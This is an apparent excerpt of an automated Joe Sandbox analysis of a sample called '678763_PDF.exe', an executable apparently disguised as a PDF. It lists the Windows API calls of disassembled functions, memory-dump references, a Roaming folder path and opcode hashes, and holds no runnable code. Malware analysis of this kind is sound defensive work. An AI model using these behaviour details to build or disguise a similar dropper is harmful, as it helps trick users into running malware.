                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404A16
                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404A40
                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404AFC
                                                                                                                                                                                    • lstrcmpiW.KERNEL32(: Completed,0042CA68,00000000,?,?), ref: 00404B2E
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,: Completed), ref: 00404B3A
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C
                                                                                                                                                                                      • Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE
                                                                                                                                                                                      • Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\678763_PDF.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                                                                                                                      • Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                                                                                                                      • Part of subcall function 00406805: CharNextW.USER32(?,"C:\Users\user\Desktop\678763_PDF.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                                                                                                                      • Part of subcall function 00406805: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
                                                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A
                                                                                                                                                                                      • Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                                                                                                                      • Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
                                                                                                                                                                                      • Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                    • String ID: : Completed$A$C:\Users\user\AppData\Roaming\erstatningsgraden
                                                                                                                                                                                    • API String ID: 2624150263-2049196090
                                                                                                                                                                                    • Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                                                                                                                    • Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
                                                                                                                                                                                    • Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                                                                                                                    • Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 0040226E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\erstatningsgraden
                                                                                                                                                                                    • API String ID: 542301482-1967000036
                                                                                                                                                                                    • Opcode ID: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
                                                                                                                                                                                    • Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
                                                                                                                                                                                    • Opcode Fuzzy Hash: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
                                                                                                                                                                                    • Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                                                    • Opcode ID: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                                                                                                                                                                    • Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
                                                                                                                                                                                    • Opcode Fuzzy Hash: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                                                                                                                                                    • Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
                                                                                                                                                                                    • Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                                                                                                                                                    • Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                                                                                                                                                    • Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404F5B
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404F66
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
                                                                                                                                                                                    • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
                                                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
                                                                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
                                                                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
                                                                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040503D
                                                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
                                                                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F
                                                                                                                                                                                      • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00405181
                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 0040519F
                                                                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
                                                                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
                                                                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
                                                                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0040536D
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 0040537D
                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
                                                                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
                                                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00405527
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405532
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405539
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                    • String ID: $M$N
                                                                                                                                                                                    • API String ID: 2564846305-813528018
                                                                                                                                                                                    • Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                                                                                                                    • Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
                                                                                                                                                                                    • Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404747
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 00404775
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00404796
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404811
                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 00404818
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404843
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404894
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404897
                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004048B3
                                                                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
                                                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                    • String ID: : Completed$N
                                                                                                                                                                                    • API String ID: 3103080414-2140067464
                                                                                                                                                                                    • Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                                                                                                                    • Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
                                                                                                                                                                                    • Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                    • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                    • String ID: F
                                                                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                                                                    • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                                                                                                                                                    • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                                                                                                                                                                    • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
                                                                                                                                                                                      • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                                                                                                                                      • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
                                                                                                                                                                                    • wsprintfA.USER32 ref: 0040621C
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
                                                                                                                                                                                    • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406305
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C
                                                                                                                                                                                      • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\678763_PDF.exe,80000000,00000003), ref: 0040604B
